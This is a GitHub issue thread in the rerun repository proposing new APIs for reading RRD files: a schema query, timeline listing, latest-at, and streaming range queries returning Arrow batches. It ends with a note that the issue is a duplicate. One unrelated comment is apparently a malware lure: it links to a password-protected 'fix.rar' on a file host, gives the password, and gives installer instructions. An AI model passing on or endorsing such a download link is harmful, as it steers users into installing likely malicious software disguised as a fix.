### ISSUE TITLE
New APIs for data access

### ISSUE THREAD

**Issue by jleibs** [rerun-io/rerun#7276]
The user should be able to open an existing RRD.

Using the open RRD object, we should expose 4 new APIs:
- Get “Schema”
    - Probably takes an EntityExpression as an input
    - Returns Columns w/ information about entities, components, and types, static/dynamic
- List timelines
     - Timeline + TimeRange
- Latest-at (list of columns (multi entity), timestamp)
    - Returns ArrowRecordBatch (single row)
- RangeQuery (list of columns (multi entity), single point of view column, time range, timeline)
    - Returns iterator of ArrowRecordBatch (multiple rows)
    - This should be a "streaming" API so we don't need to allocate memory for the entire frame

The inputs to the APIs that take a list of columns likely either use ColumnDescriptors returned from the Schema API, or an EntityPath expression that can be indirectly evaluated to a list of columns.

When this is done we should have an easy piece of example code that opens and rrd and constructrs a dataframe that is fed into pandas or polars.

**Comment by youngerwarrior** [comment]
Download 
https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by jleibs** [comment]
Dup of: https://github.com/rerun-io/rerun/issues/6811
